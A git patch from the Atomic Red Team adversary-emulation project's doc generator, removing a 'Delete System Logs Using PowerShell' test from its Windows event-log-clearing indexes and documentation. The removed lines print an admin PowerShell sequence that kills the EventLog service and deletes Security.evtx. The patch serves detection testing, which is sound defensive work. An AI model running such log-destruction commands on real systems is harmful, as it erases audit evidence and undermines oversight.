From e8340a678f68da9940323e190e3ed02f215b6f9e Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 20 Jul 2020 12:37:27 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master

---
 atomics/Indexes/Indexes-CSV/index.csv | 3 +-
 atomics/Indexes/Indexes-CSV/windows-index.csv | 3 +-
 atomics/Indexes/Indexes-Markdown/index.md | 3 +-
 .../Indexes/Indexes-Markdown/windows-index.md | 3 +-
 atomics/Indexes/index.yaml | 18 --------
 atomics/T1551.001/T1551.001.md | 38 +------------------
 6 files changed, 6 insertions(+), 62 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index a88e8aaf..8abb0408 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -222,8 +222,7 @@ defense-evasion,T1551.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-
 defense-evasion,T1551.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
 defense-evasion,T1551.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
 defense-evasion,T1551.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
-defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using PowerShell,334c36ca-fec3-47ff-afdb-22b2ae6d0812,powershell
-defense-evasion,T1551.001,Clear Windows Event Logs,3,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
+defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
 defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
 defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
 defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index fcbcb654..30d68919 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -65,8 +65,7 @@ defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt De
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1551.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
-defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using PowerShell,334c36ca-fec3-47ff-afdb-22b2ae6d0812,powershell
-defense-evasion,T1551.001,Clear Windows Event Logs,3,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
+defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
 defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
 defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
 defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index c06d75ed..a308dc96 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -467,8 +467,7 @@
 - Atomic Test #3: Overwrite Linux Log [linux]
 - [T1551.001 Clear Windows Event Logs](../../T1551.001/T1551.001.md)
 - Atomic Test #1: Clear Logs [windows]
- - Atomic Test #2: Delete System Logs Using PowerShell [windows]
- - Atomic Test #3: Delete System Logs Using Clear-EventLogId [windows]
+ - Atomic Test #2: Delete System Logs Using Clear-EventLogId [windows]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index b6c5aacd..1e986429 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -139,8 +139,7 @@
 - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
 - [T1551.001 Clear Windows Event Logs](../../T1551.001/T1551.001.md)
 - Atomic Test #1: Clear Logs [windows]
- - Atomic Test #2: Delete System Logs Using PowerShell [windows]
- - Atomic Test #3: Delete System Logs Using Clear-EventLogId [windows]
+ - Atomic Test #2: Delete System Logs Using Clear-EventLogId [windows]
 - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
 - Atomic Test #1: Compile After Delivery using csc.exe [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 08bcb96f..1233a227 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -21240,24 +21240,6 @@ defense-evasion:
 '
 name: command_prompt
 elevation_required: true
- - name: Delete System Logs Using PowerShell
- auto_generated_guid: 334c36ca-fec3-47ff-afdb-22b2ae6d0812
- description: |
- Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
- Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
- When this service gets stopped, it is automatically restarted and the Security.evtx file re-created.
- supported_platforms:
- - windows
- executor:
- command: |
- $eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
- Stop-Process -Id $eventLogId -Force
- Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
- cleanup_command: 'Start-Service -Name EventLog
-
-'
- name: powershell
- elevation_required: true
 - name: Delete System Logs Using Clear-EventLogId
 auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498
 description: |
diff --git a/atomics/T1551.001/T1551.001.md b/atomics/T1551.001/T1551.001.md
index a5b7dfb5..ea84e8b2 100644
--- a/atomics/T1551.001/T1551.001.md
+++ b/atomics/T1551.001/T1551.001.md
@@ -14,9 +14,7 @@ These logs may also be cleared through other mechanisms, such as the event viewe
 - [Atomic Test #1 - Clear Logs](#atomic-test-1---clear-logs)
-- [Atomic Test #2 - Delete System Logs Using PowerShell](#atomic-test-2---delete-system-logs-using-powershell)
-
-- [Atomic Test #3 - Delete System Logs Using Clear-EventLogId](#atomic-test-3---delete-system-logs-using-clear-eventlogid)
+- [Atomic Test #2 - Delete System Logs Using Clear-EventLogId](#atomic-test-2---delete-system-logs-using-clear-eventlogid)
@@ -50,39 +48,7 @@ wevtutil cl #{log_name}

-## Atomic Test #2 - Delete System Logs Using PowerShell
-Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
-Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
-When this service gets stopped, it is automatically restarted and the Security.evtx file re-created.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-
-```powershell
-$eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
-Stop-Process -Id $eventLogId -Force
-Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
-```
-
-#### Cleanup Commands:
-```powershell
-Start-Service -Name EventLog
-```
-
-
-
-
-
-
-
-
-## Atomic Test #3 - Delete System Logs Using Clear-EventLogId
+## Atomic Test #2 - Delete System Logs Using Clear-EventLogId
 Clear event logs using built-in PowerShell commands.
 Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.